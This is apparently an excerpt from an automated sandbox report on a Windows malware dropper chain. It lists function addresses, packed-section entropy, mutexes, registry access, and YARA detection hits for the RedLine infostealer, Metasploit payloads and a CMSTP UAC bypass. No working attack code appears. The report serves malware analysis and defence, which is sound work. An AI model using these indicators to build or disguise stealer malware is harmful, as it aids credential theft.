Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0085E200	23_2_0085E200
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00835210	23_2_00835210
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00846210	23_2_00846210
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00852229	23_2_00852229
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00849230	23_2_00849230
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00849A40	23_2_00849A40
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00867250	23_2_00867250
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084EA5C	23_2_0084EA5C
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0082A260	23_2_0082A260
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00822A60	23_2_00822A60
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0085226B	23_2_0085226B
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084DB8D	23_2_0084DB8D
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084E39D	23_2_0084E39D
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00859BA0	23_2_00859BA0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084E3B6	23_2_0084E3B6
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0085EBF0	23_2_0085EBF0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00830B14	23_2_00830B14
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084BB24	23_2_0084BB24
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0082E320	23_2_0082E320
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00860334	23_2_00860334
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00831351	23_2_00831351
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084B494	23_2_0084B494
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00829490	23_2_00829490
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_008454A0	23_2_008454A0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_008544A0	23_2_008544A0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0082BCB0	23_2_0082BCB0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0083B4B8	23_2_0083B4B8
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0082C4D0	23_2_0082C4D0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00849CD0	23_2_00849CD0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00845CD0	23_2_00845CD0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00827CE0	23_2_00827CE0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00857C30	23_2_00857C30
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0085E460	23_2_0085E460
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00823470	23_2_00823470
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00856D94	23_2_00856D94
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_008355A0	23_2_008355A0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_008385D0	23_2_008385D0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0082FD00	23_2_0082FD00
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084E500	23_2_0084E500
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00866D00	23_2_00866D00
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084C520	23_2_0084C520
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00841D20	23_2_00841D20
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00851540	23_2_00851540
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00866550	23_2_00866550
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00830562	23_2_00830562
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00848575	23_2_00848575
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00853570	23_2_00853570
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00864E90	23_2_00864E90
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_008416A0	23_2_008416A0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0083CEAB	23_2_0083CEAB
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_008226B0	23_2_008226B0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0082DEB0	23_2_0082DEB0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_008406B0	23_2_008406B0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_008246F2	23_2_008246F2
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00865E00	23_2_00865E00
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00823E10	23_2_00823E10
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084F616	23_2_0084F616
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00839E30	23_2_00839E30
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00859E50	23_2_00859E50
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0083D670	23_2_0083D670
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0085F670	23_2_0085F670
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00849E79	23_2_00849E79
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0082CFC8	23_2_0082CFC8
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0083C7D2	23_2_0083C7D2
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084BFDF	23_2_0084BFDF
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00828F10	23_2_00828F10
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00826F16	23_2_00826F16
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00840F40	23_2_00840F40
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00862740	23_2_00862740
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0083FF62	23_2_0083FF62
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0084DF62	23_2_0084DF62
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_0083BF71	23_2_0083BF71

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: String function: 00419380 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: String function: 0040B2B0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: String function: 0040B250 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: String function: 004185C0 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: String function: 0082B250 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: String function: 008385C0 appears 102 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1896 -ip 1896

Source: PqodvBZ.exe.6.dr	Static PE information: No import functions for PE file found
Source: PqodvBZ[1].exe.6.dr	Static PE information: No import functions for PE file found

Source: 1w5RpHuliE.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 24.2.976cb97ff6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001E.00000002.3396511396.000000000ECBE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001B.00000003.3145250358.000000000E0BE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001E.00000003.3280018996.000000000ECBE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001B.00000002.3197687317.000000000E0BE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000D.00000003.3068524352.000000000A810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001B.00000002.3197107411.000000000DFD8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000001E.00000002.3396257355.000000000EB80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001B.00000003.3145250358.000000000E02E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001B.00000002.3197687317.000000000E02E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001E.00000002.3396257355.000000000EC2E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000D.00000002.3110324959.000000000A810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: ViGgA8C.exe PID: 6044, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: PqodvBZ[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PqodvBZ.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: PqodvBZ.exe.6.dr	Static PE information: Section .text
Source: PqodvBZ[1].exe.6.dr	Static PE information: Section .text

Source: 1w5RpHuliE.exe	Static PE information: Section: ZLIB complexity 0.9979085064713896
Source: 1w5RpHuliE.exe	Static PE information: Section: fhqdylkh ZLIB complexity 0.9942726175646216
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9979085064713896
Source: skotes.exe.0.dr	Static PE information: Section: fhqdylkh ZLIB complexity 0.9942726175646216
Source: KbSwZup.exe.6.dr	Static PE information: Section: byidmovu ZLIB complexity 0.9944762713658762
Source: ViGgA8C[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: ViGgA8C[1].exe.6.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: ViGgA8C.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: ViGgA8C.exe.6.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: xkV9ZML[1].exe.6.dr	Static PE information: Section: .CODE ZLIB complexity 1.0003260103383458
Source: xkV9ZML.exe.6.dr	Static PE information: Section: .CODE ZLIB complexity 1.0003260103383458
Source: random[1].exe0.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[1].exe0.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 4dfe6dfd76.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 4dfe6dfd76.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: Bjkm5hE[1].exe.6.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: Bjkm5hE[1].exe.6.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: random[1].exe1.6.dr	Static PE information: Section: sofxbkhh ZLIB complexity 0.9941575427494026
Source: Bjkm5hE.exe.6.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: Bjkm5hE.exe.6.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: b4fe2af6b4.exe.6.dr	Static PE information: Section: sofxbkhh ZLIB complexity 0.9941575427494026
Source: random[2].exe.6.dr	Static PE information: Section: ZLIB complexity 0.996290275621118
Source: random[2].exe.6.dr	Static PE information: Section: vzyisczj ZLIB complexity 0.9942254410434258
Source: 976cb97ff6.exe.6.dr	Static PE information: Section: ZLIB complexity 0.996290275621118
Source: 976cb97ff6.exe.6.dr	Static PE information: Section: vzyisczj ZLIB complexity 0.9942254410434258
Source: random[2].exe0.6.dr	Static PE information: Section: zupxjdus ZLIB complexity 0.9945103090371369
Source: cbf2b6294a.exe.6.dr	Static PE information: Section: zupxjdus ZLIB complexity 0.9945103090371369
Source: KbSwZup[1].exe.6.dr	Static PE information: Section: byidmovu ZLIB complexity 0.9944762713658762
Source: lt8kslFxQ.exe.29.dr	Static PE information: Section: hcpwmnu ZLIB complexity 1.021484375

Source: ViGgA8C.exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: ViGgA8C[1].exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: random[1].exe0.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe0.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4dfe6dfd76.exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4dfe6dfd76.exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'

Source: xkV9ZML[1].exe.6.dr, Program.cs	Base64 encoded string: 'MTQyYTQ4MTE1ZDFiOTI0M2RmNTAyZmUyYTkxNTUxZWQyMDc3Y2M5MDZlMmE3YTU1YTgwZGZiMTkwZjQxZDlhNA=='
Source: xkV9ZML.exe.6.dr, Program.cs	Base64 encoded string: 'MTQyYTQ4MTE1ZDFiOTI0M2RmNTAyZmUyYTkxNTUxZWQyMDc3Y2M5MDZlMmE3YTU1YTgwZGZiMTkwZjQxZDlhNA=='
Source: random[1].exe0.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 4dfe6dfd76.exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 7.2.xkV9ZML.exe.5b80000.1.raw.unpack, Program.cs	Base64 encoded string: 'MTQyYTQ4MTE1ZDFiOTI0M2RmNTAyZmUyYTkxNTUxZWQyMDc3Y2M5MDZlMmE3YTU1YTgwZGZiMTkwZjQxZDlhNA=='
Source: 7.2.xkV9ZML.exe.3919550.0.raw.unpack, Program.cs	Base64 encoded string: 'MTQyYTQ4MTE1ZDFiOTI0M2RmNTAyZmUyYTkxNTUxZWQyMDc3Y2M5MDZlMmE3YTU1YTgwZGZiMTkwZjQxZDlhNA=='
Source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@67/88@32/9

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Code function: 10_2_00440A50 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

10_2_00440A50

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xkV9ZML[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Mutant created: \Sessions\1\BaseNamedObjects\lEoISSVmRadFCSkwWUcz
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\RunOnlyOnce_MyProjectShine
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1048
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1896

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
